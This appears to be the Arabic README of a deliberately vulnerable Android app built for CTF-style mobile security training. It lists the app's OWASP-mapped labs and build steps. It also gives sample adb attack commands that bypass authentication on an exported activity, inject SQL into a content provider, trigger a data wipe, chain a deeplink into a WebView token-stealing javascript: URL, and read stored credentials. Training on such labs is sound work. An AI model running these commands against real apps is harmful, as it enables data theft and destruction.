
تطبيق Android معرّض للثغرات بشكل متعمد لأبحاث أمن التطبيقات الجوّالة وممارسة مكافآت الثغرات - OWASP Mobile Top 10
تطبيق Android ضعيف بشكل متعمد لأبحاث أمن الهواتف المحمولة، وممارسة صيد الثغرات، والتعلم بأسلوب CTF. يحتوي على 21 ثغرة موثقة مرتبطة بـ OWASP Mobile Top 10.
git clone [email protected]:b4sith-sec/Gu3ssWeak.git
cd Gu3ssWeak
./gradlew assembleDebug
adb install -r app/build/outputs/apk/debug/app-debug.apk
شغّل التطبيق، وتنقّل عبر كل مختبر، والتقط الأعلام (flags)، ثم أرسلها على لوحة نتائج CTF داخل التطبيق.
| الفئة | الثغرات | الأعلام |
|---|---|---|
| WebView | WV-01 إلى WV-05 | 5 |
| Deeplink | DL-01 إلى DL-04، DL-CHAIN | 5 |
| Auth / SQL Injection | SQL-01 | 1 |
| Admin Panel | AP-01 إلى AP-04 | 2 |
| ContentProvider | CP-01 | 1 |
| Broadcast Receiver | BR-01 إلى BR-03 | 2 |
| Service | SV-01، SV-02a، SV-02b | 2 |
| Network Interception | NET-01 | 1 |
| Banking / OTP | OTP-01 | 1 |
| LFI | LFI-01 | 1 |
| Storage | STORE-01 | 1 |
| XSS | XSS-01، XSS-02 | 2 |
إجمالي 20 علماً، بالإضافة إلى علم رئيسي يُمنح عند التقاطها جميعاً.
| قائمة المختبرات | لوحة نتائج CTF |
|---|---|
| lab |
# Admin panel - exported, no permission
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity
adb shell am start -n com.gu3sswe4k.app/.activities.AdminPanelActivity --ez is_authenticated true
adb shell "content query --uri content://com.gu3sswe4k.app.contacts/contacts/1 --where \"1) OR (1=1\""
# Token injection via broadcast
adb shell am broadcast -a com.gu3sswe4k.app.SEND_TOKEN --es token FAKE --es user attacker
# Data wipe via exported service
adb shell am startservice -n com.gu3sswe4k.app/.services.DataSyncService --es action wipe_user_data
# Deeplink to WebView RCE chain
adb shell am start -a android.intent.action.VIEW -d "vulndroid://settings?redirect=com.gu3sswe4k.app.activities.WebViewActivity&url=javascript:VulnBridge.stealToken()"
# Read plaintext stored credentials
adb shell run-as com.gu3sswe4k.app cat /data/data/com.gu3sswe4k.app/shared_prefs/login_prefs.xml
# Watch for logged secrets
adb logcat | grep Gu3ssWeak
هذا المشروع تعليمي بحت. جميع الثغرات متعمدة وموثقة. تنطبق التقنيات المعروضة هنا على تطبيقات حقيقية، لكن لا تختبر إلا الأنظمة التي تملكها أو المصرّح لك باختبارها. راجع SECURITY.md للاطلاع على إخلاء المسؤولية الكامل وإرشادات الإفصاح المسؤول.
MIT - راجع LICENSE.